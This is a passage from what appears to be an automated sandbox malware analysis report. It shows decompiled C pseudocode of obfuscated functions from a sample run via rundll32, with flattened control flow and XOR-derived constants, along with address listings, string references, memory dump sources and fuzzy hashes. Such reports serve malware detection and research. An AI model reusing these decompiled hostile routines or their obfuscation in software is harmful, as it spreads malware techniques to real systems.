								_t219 = 0x10000;
								_push(_t189);
								_t174 = E004354FB(0x10000);
								_t188 = _t174;
								if(_t188 != 0) {
									_v28 = _t174;
									_t224 = 0x10000;
									L7:
									_t189 = _v24;
									_t221 = 0x145613b1;
									continue;
								}
							} else {
								if(_t221 != 0x1b1ec7af) {
									goto L15;
								} else {
									_t221 = 0x146a35d3;
									continue;
								}
							}
							goto L16;
						}
						_t191 = E004434DA(_v52,  &_v16, _v80, _v56, _t224, _t174, _t189);
						_t225 =  &(_t225[5]);
						_v20 = _t191;
						if(_t191 == 0) {
							L14:
							_t189 = _v24;
							_t221 = 0x2a69df6d;
							goto L15;
						} else {
							_t195 = _v16;
							if(_t195 == 0) {
								goto L14;
							} else {
								_t174 = _v28 + _t195;
								_v28 = _v28 + _t195;
								_t224 = _t224 - _t195;
								if(_t224 != 0) {
									goto L7;
								} else {
									_t196 = _t219 + _t219;
									_push(_t196);
									_v12 = _t196;
									_t223 = E004354FB(_t196);
									if(_t223 != 0) {
										E00436374(_v32, _t223, _t219, _t188, _v36);
										E0043DE81(_v72, _t188, _v76);
										_t224 = _t219;
										_t174 = _t223 + _t219;
										_t219 = _v12;
										_t225 =  &(_t225[4]);
										_v28 = _t174;
										_t188 = _t223;
										if(_t224 != 0) {
											goto L7;
										}
									}
								}
							}
						}
						break;
						L15:
						_t174 = _v28;
					} while (_t221 != 0x2a69df6d);
					L16:
					_t222 = _v20;
					if(_t222 != 0) {
						_t178 = _v8;
						 *_t178 = _t188;
						 *((intOrPtr*)(_t178 + 4)) = _t219 - _t224;
					} else {
						E0043DE81(_v64, _t188, _v68);
					}
					return _t222;
				}
			}

0x00439d2f
0x00439d2f
0x00439d36
0x00439d3a
0x00439d3e
0x00439d46
0x00439d52
0x00439d5b
0x00439d60
0x00439d65
0x00439d6b
0x00439d73
0x00439d7b
0x00439d87
0x00439d8c
0x00439d92
0x00439d9a
0x00439da2
0x00439daa
0x00439db2
0x00439dba
0x00439dc2
0x00439dca
0x00439dcf
0x00439dd7
0x00439ddf
0x00439de7
0x00439df4
0x00439df5
0x00439df9
0x00439dfe
0x00439e06
0x00439e0e
0x00439e13
0x00439e1b
0x00439e23
0x00439e31
0x00439e3a
0x00439e3e
0x00439e46
0x00439e4e
0x00439e56
0x00439e5e
0x00439e66
0x00439e6e
0x00439e76
0x00439e7e
0x00439e86
0x00439e8b
0x00439e93
0x00439e9b
0x00439ea8
0x00439eac
0x00439eb1
0x00439eb6
0x00439ebe
0x00439ec6
0x00439ecb
0x00439ed3
0x00439edb
0x00439ee3
0x00439eeb
0x00439efb
0x00439efe
0x00439f02
0x00439f06
0x00439f0a
0x00439f0e
0x00439f13
0x00439f1b
0x00439f28
0x00439f2c
0x00439f34
0x00439f3c
0x00000000
0x00439f40
0x00439f40
0x00439f40
0x00439f4e
0x00439f67
0x00439f72
0x00439f73
0x00439f78
0x00439f7d
0x00439f83
0x00439f87
0x00439f89
0x00439f89
0x00439f8d
0x00000000
0x00439f8d
0x00439f50
0x00439f56
0x00000000
0x00439f5c
0x00439f5c
0x00000000
0x00439f5c
0x00439f56
0x00000000
0x00439f4e
0x00439fac
0x00439fae
0x00439fb1
0x00439fb7
0x0043a028
0x0043a028
0x0043a02c
0x00000000
0x00439fb9
0x00439fb9
0x00439fbf
0x00000000
0x00439fc1
0x00439fc5
0x00439fc7
0x00439fcb
0x00439fcd
0x00000000
0x00439fcf
0x00439fd3
0x00439fdc
0x00439fdd
0x00439fe6
0x00439feb
0x00439ff9
0x0043a008
0x0043a00d
0x0043a00f
0x0043a012
0x0043a016
0x0043a019
0x0043a01d
0x0043a021
0x00000000
0x0043a023
0x0043a021
0x00439feb
0x00439fcd
0x00439fbf
0x00000000
0x0043a031
0x0043a031
0x0043a035
0x0043a041
0x0043a041
0x0043a047
0x0043a05f
0x0043a065
0x0043a067
0x0043a049
0x0043a053
0x0043a05c
0x0043a073
0x0043a073

Strings

:X, xrefs: 00439E3E
dP, xrefs: 00439DFE
G, xrefs: 00439EE3

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: :X$G$dP
API String ID: 0-1717702412
Opcode ID: 0a730519cfd8e6b6f762032c559e3e7c70812bbcb69a7fffbabd17b92223504c
Instruction ID: ba1d14ccdf58f08bd20b9d2976628749f2a88ec148d1fe53c5e93563d59ed828
Opcode Fuzzy Hash: 0a730519cfd8e6b6f762032c559e3e7c70812bbcb69a7fffbabd17b92223504c
Instruction Fuzzy Hash: 449142716093418FD358CF2AC48540BFBF1BBC8758F40991EF492A7261C7B9DA498F86

Uniqueness

Uniqueness Score: -1.00%

Function 001792A3, Relevance: 3.9, Strings: 3, Instructions: 197COMMON

Download Yara Rule

Strings

:X, xrefs: 001793B2
dP, xrefs: 00179372
G, xrefs: 00179457

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: :X$G$dP
API String ID: 0-1717702412
Opcode ID: 0a730519cfd8e6b6f762032c559e3e7c70812bbcb69a7fffbabd17b92223504c
Instruction ID: adeb21a91775eef01dc55052d3219d4a6ef1460232a2aeacee8f0054ff6b3289
Opcode Fuzzy Hash: 0a730519cfd8e6b6f762032c559e3e7c70812bbcb69a7fffbabd17b92223504c
Instruction Fuzzy Hash: 659141716093418FD358CF29C58541BFBF1BBC4758F408A1EF49A97260C7B5CA0A8F82

Uniqueness

Uniqueness Score: -1.00%

Function 0044135B, Relevance: 3.9, Strings: 3, Instructions: 158
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0044135B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t142;
				void* _t164;
				void* _t167;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t185;
				signed int* _t188;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t142);
				_v68 = 0xf6fd;
				_t188 =  &(( &_v68)[5]);
				_t185 = 0;
				_t167 = 0x120b6438;
				_t181 = 0x37;
				_v68 = _v68 / _t181;
				_t182 = 6;
				_v68 = _v68 * 0x52;
				_v68 = _v68 + 0xcd83;
				_v68 = _v68 ^ 0x00023d8c;
				_v12 = 0xd60a;
				_v12 = _v12 + 0xd6ec;
				_v12 = _v12 ^ 0x0001acf7;
				_v32 = 0xa29f;
				_v32 = _v32 ^ 0x4f38ff35;
				_v32 = _v32 ^ 0x0f385daa;
				_v40 = 0xdb0c;
				_v40 = _v40 << 0xc;
				_v40 = _v40 | 0xd75e623d;
				_v40 = _v40 ^ 0x9ffee23d;
				_v48 = 0x5711;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 + 0x4c96;
				_v48 = _v48 ^ 0x0000622c;
				_v28 = 0x2a8d;
				_v28 = _v28 ^ 0x2576f3ca;
				_v28 = _v28 ^ 0x2576c47f;
				_v52 = 0x1d31;
				_v52 = _v52 | 0x18ed216c;
				_v52 = _v52 * 0x26;
				_v52 = _v52 ^ 0xb3370705;
				_v36 = 0x506d;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x0000af41;
				_v56 = 0xd618;
				_v56 = _v56 + 0x2bfb;
				_v56 = _v56 / _t182;
				_v56 = _v56 ^ 0x00007f84;
				_v20 = 0x7a02;
				_v20 = _v20 + 0xffff09b4;
				_v20 = _v20 ^ 0xffffb01c;
				_v24 = 0x46f3;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x11bc9893;
				_v60 = 0xd2ca;
				_v60 = _v60 | 0xbe7a55a5;
				_v60 = _v60 << 8;
				_v60 = _v60 + 0xffffc5fa;
				_v60 = _v60 ^ 0x7ad789b6;
				_v8 = 0x5705;
				_v8 = _v8 + 0xffff783c;
				_v8 = _v8 ^ 0xfffff995;
				_v64 = 0x2f3b;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0x79a7;
				_t183 = 0x7a;
				_v64 = _v64 / _t183;
				_v64 = _v64 ^ 0x00001190;
				_v16 = 0x22f9;
				_v16 = _v16 | 0x259e41a8;
				_v16 = _v16 ^ 0x259e7296;
				_v44 = 0x5159;
				_v44 = _v44 | 0xb37bb685;
				_v44 = _v44 ^ 0x9f6900dd;
				_v44 = _v44 ^ 0x2c12c002;
				while(_t167 != 0x120b6438) {
					if(_t167 == 0x257cf60e) {
						E00434282(_v60, _v8, _v64, _a8, _t185, _v40 | _v12,  &_v4, _v16, _v44, _a4);
					} else {
						if(_t167 == 0x2df92bb4) {
							_push(_t167);
							_t185 = E004354FB(_v4 + _v4);
							if(_t185 != 0) {
								_t167 = 0x257cf60e;
								continue;
							}
						} else {
							if(_t167 != 0x39df0674) {
								L10:
								if(_t167 != 0x1bf2cd07) {
									continue;
								} else {
								}
							} else {
								_t164 = E00434282(_v48, _v28, _v52, _a8, 0, _v32 | _v68,  &_v4, _v36, _v56, _a4);
								_t188 =  &(_t188[8]);
								if(_t164 != 0) {
									_t167 = 0x2df92bb4;
									continue;
								}
							}
						}
					}
					return _t185;
				}
				_t167 = 0x39df0674;
				goto L10;
			}

0x00441362
0x00441366
0x0044136a
0x0044136e
0x0044136f
0x00441370
0x00441375
0x0044137d
0x00441386
0x00441388
0x0044138f
0x00441394
0x0044139f
0x004413a2
0x004413a6
0x004413ae
0x004413b6
0x004413be
0x004413c6
0x004413ce
0x004413d6
0x004413de
0x004413e6
0x004413ee
0x004413f3
0x004413fb
0x00441403
0x0044140b
0x00441410
0x00441418
0x00441420
0x00441428
0x00441430
0x00441438
0x00441440
0x0044144d
0x00441451
0x00441459
0x00441461
0x00441465
0x0044146d
0x00441475
0x00441485
0x00441489
0x00441491
0x00441499
0x004414a1
0x004414a9
0x004414b1
0x004414b6
0x004414be
0x004414c6
0x004414ce
0x004414d3
0x004414db
0x004414e3
0x004414eb
0x004414f3
0x004414fb
0x00441503
0x00441508
0x00441514
0x00441517
0x0044151b
0x00441528
0x00441535
0x00441542
0x0044154a
0x00441552
0x0044155a
0x00441562
0x0044156a
0x00441574
0x00441611
0x00441576
0x00441578
0x004415c6
0x004415cf
0x004415d4
0x004415d6
0x00000000
0x004415d6
0x0044157a
0x0044157c
0x004415dc
0x004415e2
0x00000000
0x00000000
0x004415e4
0x0044157e
0x004415aa
0x004415af
0x004415b4
0x004415b6
0x00000000
0x004415b6
0x004415b4
0x0044157c
0x00441578
0x00441622
0x00441622
0x004415da
0x00000000

Strings

mP, xrefs: 00441459
YQ, xrefs: 0044154A
;/, xrefs: 004414FB

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ;/$YQ$mP
API String ID: 0-3666080072
Opcode ID: 47880b2951c1e1c441204921e8a5573947b7b5d1dd38183dfbb91e3983d3d2ca
Instruction ID: e168dd7fdc2a74a17f864965adca2e3f4d0426fea31bee7b0152447e63727e1e
Opcode Fuzzy Hash: 47880b2951c1e1c441204921e8a5573947b7b5d1dd38183dfbb91e3983d3d2ca
Instruction Fuzzy Hash: 747133B1108341ABE358CF65C98981FBBF1BBD4758F144A1EF19A96260D3B9CA488F47

Uniqueness

Uniqueness Score: -1.00%

Function 001808CF, Relevance: 3.9, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

mP, xrefs: 001809CD
YQ, xrefs: 00180ABE
;/, xrefs: 00180A6F

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ;/$YQ$mP
API String ID: 0-3666080072
Opcode ID: a4894dc86a31309ad7004ee06dbd5a022662d05678d9d1ed36526e4b0c62e3ff
Instruction ID: 5ce0b1394e484dc7e4a5af91d04e51f447a0b30c3367b91db4bb91ed1649eda2
Opcode Fuzzy Hash: a4894dc86a31309ad7004ee06dbd5a022662d05678d9d1ed36526e4b0c62e3ff
Instruction Fuzzy Hash: 317132B21083419FD398CF61C88981BBBF1BBD9758F104A1DF59A56260D3B5CA48CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0043C145, Relevance: 3.9, Strings: 3, Instructions: 146
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0043C145(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _v72;
				intOrPtr _v76;
				void* _t158;
				void* _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				intOrPtr* _t187;
				signed int _t188;
				intOrPtr* _t189;
				void* _t190;

				_v76 = 0x4e59b3;
				asm("stosd");
				_t162 = __ecx;
				_t164 = 0x15;
				asm("stosd");
				_t188 = 9;
				asm("stosd");
				_v12 = 0xc9c5;
				_t187 = 0x451084;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 * 0x7d;
				_v12 = _v12 * 0x52;
				_v12 = _v12 ^ 0x0003e898;
				_v8 = 0x326b;
				_v8 = _v8 ^ 0x4a0ebab0;
				_v8 = _v8 * 0x1a;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0008366f;
				_v40 = 0x35fc;
				_v40 = _v40 | 0x4fdc2f8a;
				_v40 = _v40 ^ 0x4fdc2023;
				_v48 = 0xbcdb;
				_v48 = _v48 + 0x5d48;
				_v48 = _v48 ^ 0x00014504;
				_v20 = 0xc333;
				_v20 = _v20 << 6;
				_v20 = _v20 + 0xab7c;
				_v20 = _v20 ^ 0x90b5416b;
				_v20 = _v20 ^ 0x90846b09;
				_v44 = 0xaf61;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x0000016e;
				_v32 = 0xeeb1;
				_v32 = _v32 / _t164;
				_v32 = _v32 << 2;
				_v32 = _v32 ^ 0x0000131e;
				_v56 = 0x101;
				_v56 = _v56 << 7;
				_v56 = _v56 ^ 0x0000810a;
				_v24 = 0x5cc;
				_v24 = _v24 << 0xb;
				_t165 = 0x68;
				_v24 = _v24 * 0x53;
				_v24 = _v24 / _t188;
				_v24 = _v24 ^ 0x01abf608;
				_v36 = 0x9340;
				_v36 = _v36 << 4;
				_v36 = _v36 * 0x3d;
				_v36 = _v36 ^ 0x02311cdc;
				_v52 = 0xb9f4;
				_v52 = _v52 << 0xc;
				_v52 = _v52 ^ 0x0b9f20c2;
				_v28 = 0x28eb;
				_v28 = _v28 << 0xb;
				_v28 = _v28 << 5;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x051d1262;
				_v60 = 0xd87b;
				_v60 = _v60 / _t165;
				_v60 = _v60 ^ 0x00004114;
				_v16 = 0x63a3;
				_v16 = _v16 ^ 0x0cdbf93f;
				_t166 = 0x44;
				_v16 = _v16 / _t166;
				_v16 = _v16 / _t188;
				_v16 = _v16 ^ 0x000560e1;
				_t189 =  *0x451084;
				while(_t189 != 0) {
					if( *((intOrPtr*)(_t189 + 8)) == 0) {
						L4:
						 *_t187 =  *_t189;
						_t158 = E0043DE81(_v28, _t189, _v60);
					} else {
						_t158 = E0044C631(_v12, _t162,  *((intOrPtr*)(_t189 + 0x28)), _v8, _v40);
						_t190 = _t190 + 0xc;
						if(_t158 != _v16) {
							_t187 = _t189;
						} else {
							 *((intOrPtr*)(_t189 + 0x18))( *((intOrPtr*)(_t189 + 8)), 0, 0);
							E0044A8BF(_v48, _v20, _v44, _v32,  *((intOrPtr*)(_t189 + 8)));
							E0043F1ED(_v56, _v24, _v36, _v52,  *((intOrPtr*)(_t189 + 0x28)));
							_t190 = _t190 + 0x18;
							goto L4;
						}
					}
					_t189 =  *_t187;
				}
				return _t158;
			}

0x0043c14b
0x0043c15c
0x0043c15d
0x0043c161
0x0043c164
0x0043c165
0x0043c168
0x0043c169
0x0043c170
0x0043c175
0x0043c17d
0x0043c184
0x0043c187
0x0043c18e
0x0043c195
0x0043c1a0
0x0043c1a3
0x0043c1a7
0x0043c1ae
0x0043c1b5
0x0043c1bc
0x0043c1c3
0x0043c1ca
0x0043c1d1
0x0043c1d8
0x0043c1df
0x0043c1e3
0x0043c1ea
0x0043c1f1
0x0043c1f8
0x0043c1ff
0x0043c203
0x0043c20a
0x0043c218
0x0043c21b
0x0043c21f
0x0043c226
0x0043c22d
0x0043c231
0x0043c238
0x0043c23f
0x0043c247
0x0043c248
0x0043c252
0x0043c255
0x0043c25c
0x0043c263
0x0043c26b
0x0043c26e
0x0043c275
0x0043c27c
0x0043c280
0x0043c287
0x0043c28e
0x0043c292
0x0043c296
0x0043c29a
0x0043c2a1
0x0043c2ad
0x0043c2b0
0x0043c2b9
0x0043c2c0
0x0043c2cc
0x0043c2d1
0x0043c2d9
0x0043c2dc
0x0043c2e3
0x0043c355
0x0043c2ef
0x0043c341
0x0043c34b
0x0043c34d
0x0043c2f1
0x0043c2ff
0x0043c304
0x0043c30a
0x0043c360
0x0043c30c
0x0043c313
0x0043c325
0x0043c339
0x0043c33e
0x00000000
0x0043c33e
0x0043c30a
0x0043c353
0x0043c353
0x0043c35f

Strings

k2, xrefs: 0043C18E
(, xrefs: 0043C287
H], xrefs: 0043C1CA

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: H]$k2$(
API String ID: 0-1078215326
Opcode ID: b142c73e5956a25f7f4512a21c4829c08aa2b377943a5f5bde8e47436d16e537
Instruction ID: 96de31af76a3a351141cd7d773fce4d6dc4b293b8b0be32ad167caa8534e5ff7
Opcode Fuzzy Hash: b142c73e5956a25f7f4512a21c4829c08aa2b377943a5f5bde8e47436d16e537
Instruction Fuzzy Hash: 2A612171D00209EBDF08CFA5D98A5DEFBB2FF48318F208059D411B62A0C7B85A49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0017B6B9, Relevance: 3.9, Strings: 3, Instructions: 146COMMON

Download Yara Rule

Strings

k2, xrefs: 0017B702
H], xrefs: 0017B73E
(, xrefs: 0017B7FB

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: H]$k2$(
API String ID: 0-1078215326
Opcode ID: 417b0d0813bbd395ec3401c326ec1af0fcf2898957f5341b52308ebd17ef56fd
Instruction ID: a6b90b889b0a77535dd32e05f8cb34747b327682319049b83960fea887b02494
Opcode Fuzzy Hash: 417b0d0813bbd395ec3401c326ec1af0fcf2898957f5341b52308ebd17ef56fd
Instruction Fuzzy Hash: 29611071D00209EBEB09CFA5D98A5DEFBB2FF48318F208059D515B62A0D3B85A49CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0043F5E0, Relevance: 3.9, Strings: 3, Instructions: 135
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0043F5E0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t108;
				void* _t120;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				void* _t131;
				void* _t148;
				signed int* _t151;

				_push(_a16);
				_t147 = _a8;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t108);
				_v100 = 0xbd2b;
				_t151 =  &(( &_v108)[6]);
				_v100 = _v100 + 0xc830;
				_v100 = _v100 ^ 0xf25ece92;
				_t148 = 0;
				_v100 = _v100 ^ 0x67839fcf;
				_t131 = 0x1bb8a706;
				_v100 = _v100 ^ 0x95dca476;
				_v104 = 0xe5f5;
				_v104 = _v104 ^ 0x3a2ce663;
				_v104 = _v104 + 0x2b7;
				_v104 = _v104 + 0xfffff7b7;
				_v104 = _v104 ^ 0x3a2bd932;
				_v108 = 0xdd91;
				_t126 = 0x78;
				_v108 = _v108 / _t126;
				_v108 = _v108 << 3;
				_v108 = _v108 | 0x72d1b8ea;
				_v108 = _v108 ^ 0x72d1fa04;
				_v76 = 0xd4ee;
				_t127 = 0x31;
				_v76 = _v76 * 0x6a;
				_v76 = _v76 ^ 0x0058075c;
				_v84 = 0x2487;
				_v84 = _v84 << 0xd;
				_v84 = _v84 / _t127;
				_v84 = _v84 ^ 0x0017b008;
				_v96 = 0x31db;
				_v96 = _v96 ^ 0x255ec927;
				_v96 = _v96 + 0x2f88;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 ^ 0x000038c6;
				_v72 = 0x5e58;
				_v72 = _v72 + 0xffff066f;
				_v72 = _v72 ^ 0xffff345d;
				_v80 = 0x2e99;
				_v80 = _v80 | 0xfff3fbee;
				_v80 = _v80 ^ 0xfff3b346;
				_v88 = 0x63de;
				_t128 = 0x6e;
				_v88 = _v88 / _t128;
				_v88 = _v88 >> 7;
				_v88 = _v88 + 0x451f;
				_v88 = _v88 ^ 0x0000098b;
				_v92 = 0x3ecb;
				_v92 = _v92 * 0x6a;
				_v92 = _v92 * 0x70;
				_v92 = _v92 * 0x17;
				_v92 = _v92 ^ 0x05a0db37;
				do {
					while(_t131 != 0x2106865) {
						if(_t131 == 0x1bb8a706) {
							_t131 = 0x222f3472;
							continue;
						} else {
							if(_t131 == 0x222f3472) {
								E0043FEE3(_a12,  &_v68, _v100, _v104, _v108, _v76);
								_t151 =  &(_t151[4]);
								_t131 = 0x2106865;
								continue;
							} else {
								_t157 = _t131 - 0x2cd0632e;
								if(_t131 != 0x2cd0632e) {
									goto L12;
								} else {
									E0043F914(_v72, _v80, _t157, _v88, _t147 + 4, _v92,  &_v68);
									_t148 =  !=  ? 1 : _t148;
								}
							}
						}
						L6:
						return _t148;
					}
					_t120 = E0043BAA2( &_v68, _v84, _v96, _t147);
					_t151 =  &(_t151[2]);
					__eflags = _t120;
					if(__eflags == 0) {
						_t131 = 0x9b007f1;
						goto L12;
					} else {
						_t131 = 0x2cd0632e;
						continue;
					}
					goto L6;
					L12:
					__eflags = _t131 - 0x9b007f1;
				} while (__eflags != 0);
				goto L6;
			}

0x0043f5e7
0x0043f5ee
0x0043f5f5
0x0043f5fc
0x0043f5fd
0x0043f604
0x0043f605
0x0043f606
0x0043f60b
0x0043f613
0x0043f616
0x0043f620
0x0043f628
0x0043f62a
0x0043f632
0x0043f637
0x0043f644
0x0043f64c
0x0043f654
0x0043f65c
0x0043f664
0x0043f66c
0x0043f67a
0x0043f67f
0x0043f685
0x0043f68a
0x0043f692
0x0043f69a
0x0043f6a7
0x0043f6aa
0x0043f6ae
0x0043f6b6
0x0043f6be
0x0043f6cb
0x0043f6cf
0x0043f6d7
0x0043f6df
0x0043f6e7
0x0043f6ef
0x0043f6f4
0x0043f6fc
0x0043f704
0x0043f70c
0x0043f714
0x0043f71c
0x0043f724
0x0043f72c
0x0043f738
0x0043f740
0x0043f744
0x0043f749
0x0043f751
0x0043f759
0x0043f766
0x0043f76f
0x0043f778
0x0043f77c
0x0043f784
0x0043f784
0x0043f792
0x0043f7fd
0x00000000
0x0043f794
0x0043f796
0x0043f7ee
0x0043f7f3
0x0043f7f6
0x00000000
0x0043f798
0x0043f798
0x0043f79a
0x00000000
0x0043f7a0
0x0043f7b9
0x0043f7c6
0x0043f7c6
0x0043f79a
0x0043f796
0x0043f7ca
0x0043f7d2
0x0043f7d2
0x0043f80e
0x0043f813
0x0043f816
0x0043f818
0x0043f821
0x00000000
0x0043f81a
0x0043f81a
0x00000000
0x0043f81a
0x00000000
0x0043f826
0x0043f826
0x0043f826
0x00000000

Strings

c,:, xrefs: 0043F64C
X^, xrefs: 0043F6FC
r4/", xrefs: 0043F73B

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: X^$c,:$r4/"
API String ID: 0-1154924512
Opcode ID: ee755c4278271f96210a97fe9531c3849dfc2dbf006185a258316c46e1c648fd
Instruction ID: 69a0bcf55eda13ea09db5af323e422242334bf9591406ee0bfad119d8a9dee90
Opcode Fuzzy Hash: ee755c4278271f96210a97fe9531c3849dfc2dbf006185a258316c46e1c648fd
Instruction Fuzzy Hash: 325159715083819BD758CF20C58691BFBF5FBC8708F505A2EF4C5962A0D7798A09CB97

Uniqueness

Uniqueness Score: -1.00%

Function 0017EB54, Relevance: 3.9, Strings: 3, Instructions: 135COMMON

Download Yara Rule

Strings

X^, xrefs: 0017EC70
r4/", xrefs: 0017ECAF
c,:, xrefs: 0017EBC0

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: X^$c,:$r4/"
API String ID: 0-1154924512
Opcode ID: b0f91960b31b42c11a33f64cea1bf467d0de1a54f0e0d13f0772bb0d76042489
Instruction ID: e107b8be15ff0a2ee1a7275663fe260ae132a9263a93257941c1231ddde69266
Opcode Fuzzy Hash: b0f91960b31b42c11a33f64cea1bf467d0de1a54f0e0d13f0772bb0d76042489
Instruction Fuzzy Hash: A15128721083819BD758CF20C98A91BFBF5FBD8708F509A1DF4C9A62A0D7758A09CB57

Uniqueness

Uniqueness Score: -1.00%

Function 00433FAF, Relevance: 3.9, Strings: 3, Instructions: 118
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00433FAF() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				void* _t97;
				signed int _t111;
				signed int _t112;
				signed int _t113;
				intOrPtr _t115;
				signed int* _t117;

				_t117 =  &_v356;
				_v328 = 0x3138;
				_t115 = 0;
				_t97 = 0x33d529cc;
				_v324 = 0;
				_v344 = 0x9123;
				_v344 = _v344 | 0x5a808bd5;
				_v344 = _v344 + 0xeb06;
				_v344 = _v344 ^ 0x5a818485;
				_v340 = 0xc804;
				_t111 = 0x44;
				_v340 = _v340 * 0x5f;
				_v340 = _v340 | 0x7b6fdd9e;
				_v340 = _v340 ^ 0x7b6fb88e;
				_v348 = 0x9154;
				_v348 = _v348 / _t111;
				_v348 = _v348 + 0x2621;
				_v348 = _v348 >> 7;
				_v348 = _v348 ^ 0x00001b68;
				_v336 = 0x690d;
				_v336 = _v336 >> 0xa;
				_v336 = _v336 ^ 0x0000404b;
				_v356 = 0x945a;
				_v356 = _v356 >> 0x10;
				_v356 = _v356 << 9;
				_t112 = 0x5d;
				_v356 = _v356 / _t112;
				_v356 = _v356 ^ 0x00005b50;
				_v332 = 0xb02a;
				_t113 = 0x60;
				_v332 = _v332 / _t113;
				_v332 = _v332 ^ 0x000056d0;
				_v352 = 0x389b;
				_v352 = _v352 * 0x54;
				_v352 = _v352 << 0xf;
				_v352 = _v352 + 0xffffdcc7;
				_v352 = _v352 ^ 0x496daad3;
				do {
					while(_t97 != 0xe09bda3) {
						if(_t97 == 0x15edbb33) {
							_t97 = 0x37fd0e9f;
							_t115 = _t115 + _v276 * 0x64;
							continue;
						} else {
							if(_t97 == 0x1cbb7e54) {
								_t97 = 0x2caaacac;
								_t115 = _t115 + (_v2 & 0x000000ff) * 0x186a0;
								continue;
							} else {
								if(_t97 == 0x213f0da0) {
									E0043B9F2( &_v320, _v356, _v332, _v352);
									_t97 = 0x1cbb7e54;
									continue;
								} else {
									if(_t97 == 0x2caaacac) {
										_t97 = 0x15edbb33;
										_t115 = _t115 + _v280 * 0x3e8;
										continue;
									} else {
										if(_t97 == 0x33d529cc) {
											_t97 = 0xe09bda3;
											continue;
										} else {
											if(_t97 != 0x37fd0e9f) {
												goto L16;
											} else {
